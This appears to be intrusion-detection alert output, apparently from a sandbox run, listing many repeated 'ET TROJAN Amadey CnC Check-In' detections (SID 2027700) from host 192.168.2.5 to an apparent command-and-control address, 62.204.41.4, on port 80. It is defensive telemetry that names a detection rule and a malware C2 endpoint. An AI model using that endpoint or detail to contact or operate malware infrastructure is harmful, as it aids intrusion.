ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449846802027700 02/07/23-19:57:42.696965
SID:	2027700
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450462802027700 02/07/23-20:00:33.222235
SID:	2027700
Source Port:	50462
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450205802027700 02/07/23-19:59:23.312322
SID:	2027700
Source Port:	50205
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449705802027700 02/07/23-19:57:06.909903
SID:	2027700
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450321802027700 02/07/23-19:59:55.064377
SID:	2027700
Source Port:	50321
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449962802027700 02/07/23-19:58:16.087938
SID:	2027700
Source Port:	49962
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449990802027700 02/07/23-19:58:22.962299
SID:	2027700
Source Port:	49990
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450113802027700 02/07/23-19:58:57.370709
SID:	2027700
Source Port:	50113
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450465802027700 02/07/23-20:00:33.942201
SID:	2027700
Source Port:	50465
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450287802027700 02/07/23-19:59:46.895270
SID:	2027700
Source Port:	50287
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449702802027700 02/07/23-19:57:05.106586
SID:	2027700
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449730802027700 02/07/23-19:57:13.243832
SID:	2027700
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449876802027700 02/07/23-19:57:53.245417
SID:	2027700
Source Port:	49876
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450143802027700 02/07/23-19:59:07.357882
SID:	2027700
Source Port:	50143
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449818802027700 02/07/23-19:57:36.123767
SID:	2027700
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450146802027700 02/07/23-19:59:08.058254
SID:	2027700
Source Port:	50146
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450437802027700 02/07/23-20:00:27.438497
SID:	2027700
Source Port:	50437
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450434802027700 02/07/23-20:00:26.717538
SID:	2027700
Source Port:	50434
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450324802027700 02/07/23-19:59:55.796737
SID:	2027700
Source Port:	50324
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449989802027700 02/07/23-19:58:22.562862
SID:	2027700
Source Port:	49989
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449871802027700 02/07/23-19:57:52.296229
SID:	2027700
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449897802027700 02/07/23-19:57:58.416673
SID:	2027700
Source Port:	49897
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449815802027700 02/07/23-19:57:35.404124
SID:	2027700
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450426802027700 02/07/23-20:00:24.801297
SID:	2027700
Source Port:	50426
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450100802027700 02/07/23-19:58:54.228469
SID:	2027700
Source Port:	50100
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449807802027700 02/07/23-19:57:33.429668
SID:	2027700
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450098802027700 02/07/23-19:58:53.748513
SID:	2027700
Source Port:	50098
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450360802027700 02/07/23-20:00:06.784027
SID:	2027700
Source Port:	50360
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450409802027700 02/07/23-20:00:18.614092
SID:	2027700
Source Port:	50409
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449848802027700 02/07/23-19:57:43.671762
SID:	2027700
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450141802027700 02/07/23-19:59:06.885723
SID:	2027700
Source Port:	50141
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449784802027700 02/07/23-19:57:27.871680
SID:	2027700
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450182802027700 02/07/23-19:59:16.745810
SID:	2027700
Source Port:	50182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450218802027700 02/07/23-19:59:28.144912
SID:	2027700
Source Port:	50218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450259802027700 02/07/23-19:59:37.982209
SID:	2027700
Source Port:	50259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450389802027700 02/07/23-20:00:13.814637
SID:	2027700
Source Port:	50389
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450289802027700 02/07/23-19:59:47.359030
SID:	2027700
Source Port:	50289
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450000802027700 02/07/23-19:58:27.513822
SID:	2027700
Source Port:	50000
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449889802027700 02/07/23-19:57:56.483664
SID:	2027700
Source Port:	49889
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449713802027700 02/07/23-19:57:09.809088
SID:	2027700
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450041802027700 02/07/23-19:58:37.467492
SID:	2027700
Source Port:	50041
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450118802027700 02/07/23-19:58:58.558092
SID:	2027700
Source Port:	50118
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450171802027700 02/07/23-19:59:14.125363
SID:	2027700
Source Port:	50171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450467802027700 02/07/23-20:00:34.410744
SID:	2027700
Source Port:	50467
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449843802027700 02/07/23-19:57:41.966115
SID:	2027700
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449884802027700 02/07/23-19:57:55.199529
SID:	2027700
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450248802027700 02/07/23-19:59:35.309770
SID:	2027700
Source Port:	50248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449881802027700 02/07/23-19:57:54.464877
SID:	2027700
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450154802027700 02/07/23-19:59:10.010091
SID:	2027700
Source Port:	50154
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450243802027700 02/07/23-19:59:34.125339
SID:	2027700
Source Port:	50243
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449970802027700 02/07/23-19:58:17.986268
SID:	2027700
Source Port:	49970
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450332802027700 02/07/23-19:59:57.750216
SID:	2027700
Source Port:	50332
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449774802027700 02/07/23-19:57:22.791511
SID:	2027700
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450047802027700 02/07/23-19:58:38.899810
SID:	2027700
Source Port:	50047
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450399802027700 02/07/23-20:00:16.236683
SID:	2027700
Source Port:	50399
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449835802027700 02/07/23-19:57:40.026952
SID:	2027700
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449924802027700 02/07/23-19:58:07.066105
SID:	2027700
Source Port:	49924
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450065802027700 02/07/23-19:58:45.626874
SID:	2027700
Source Port:	50065
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450019802027700 02/07/23-19:58:32.292789
SID:	2027700
Source Port:	50019
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450365802027700 02/07/23-20:00:08.016119
SID:	2027700
Source Port:	50365
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450215802027700 02/07/23-19:59:27.402726
SID:	2027700
Source Port:	50215
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449746802027700 02/07/23-19:57:17.135800
SID:	2027700
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449942802027700 02/07/23-19:58:11.343155
SID:	2027700
Source Port:	49942
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450108802027700 02/07/23-19:58:56.182131
SID:	2027700
Source Port:	50108
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450304802027700 02/07/23-19:59:50.968034
SID:	2027700
Source Port:	50304
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450187802027700 02/07/23-19:59:17.949465
SID:	2027700
Source Port:	50187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449853802027700 02/07/23-19:57:47.844021
SID:	2027700
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450454802027700 02/07/23-20:00:31.504096
SID:	2027700
Source Port:	50454
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449764802027700 02/07/23-19:57:20.603429
SID:	2027700
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450031802027700 02/07/23-19:58:35.304361
SID:	2027700
Source Port:	50031
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450383802027700 02/07/23-20:00:12.387972
SID:	2027700
Source Port:	50383
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450120802027700 02/07/23-19:58:59.032260
SID:	2027700
Source Port:	50120
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450276802027700 02/07/23-19:59:43.973222
SID:	2027700
Source Port:	50276
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450126802027700 02/07/23-19:59:00.503245
SID:	2027700
Source Port:	50126
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449952802027700 02/07/23-19:58:13.723295
SID:	2027700
Source Port:	49952
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450037802027700 02/07/23-19:58:36.516957
SID:	2027700
Source Port:	50037
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449958802027700 02/07/23-19:58:15.137846
SID:	2027700
Source Port:	49958
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450003802027700 02/07/23-19:58:28.269253
SID:	2027700
Source Port:	50003
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449863802027700 02/07/23-19:57:50.367777
SID:	2027700
Source Port:	49863
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450192802027700 02/07/23-19:59:19.202750
SID:	2027700
Source Port:	50192
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450393802027700 02/07/23-20:00:14.802337
SID:	2027700
Source Port:	50393
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449792802027700 02/07/23-19:57:29.791091
SID:	2027700
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449869802027700 02/07/23-19:57:51.811174
SID:	2027700
Source Port:	49869
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449999802027700 02/07/23-19:58:27.278096
SID:	2027700
Source Port:	49999
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450088802027700 02/07/23-19:58:51.281257
SID:	2027700
Source Port:	50088
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450370802027700 02/07/23-20:00:09.189137
SID:	2027700
Source Port:	50370
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450281802027700 02/07/23-19:59:45.414960
SID:	2027700
Source Port:	50281
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450110802027700 02/07/23-19:58:56.657477
SID:	2027700
Source Port:	50110
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450021802027700 02/07/23-19:58:32.794730
SID:	2027700
Source Port:	50021
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450177802027700 02/07/23-19:59:15.563617
SID:	2027700
Source Port:	50177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450419802027700 02/07/23-20:00:23.118934
SID:	2027700
Source Port:	50419
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450269802027700 02/07/23-19:59:40.413543
SID:	2027700
Source Port:	50269
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449993802027700 02/07/23-19:58:24.614337
SID:	2027700
Source Port:	49993
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450009802027700 02/07/23-19:58:29.797002
SID:	2027700
Source Port:	50009
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449812802027700 02/07/23-19:57:34.636727
SID:	2027700
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449879802027700 02/07/23-19:57:53.960321
SID:	2027700
Source Port:	49879
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449720802027700 02/07/23-19:57:10.789751
SID:	2027700
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449723802027700 02/07/23-19:57:11.507306
SID:	2027700
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449968802027700 02/07/23-19:58:17.511977
SID:	2027700
Source Port:	49968
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449901802027700 02/07/23-19:57:59.369719
SID:	2027700
Source Port:	49901
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450238802027700 02/07/23-19:59:32.939539
SID:	2027700
Source Port:	50238
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450149802027700 02/07/23-19:59:08.801458
SID:	2027700
Source Port:	50149
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449708802027700 02/07/23-19:57:08.619164
SID:	2027700
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450250802027700 02/07/23-19:59:35.782201
SID:	2027700
Source Port:	50250
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450253802027700 02/07/23-19:59:36.518712
SID:	2027700
Source Port:	50253
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450327802027700 02/07/23-19:59:56.530972
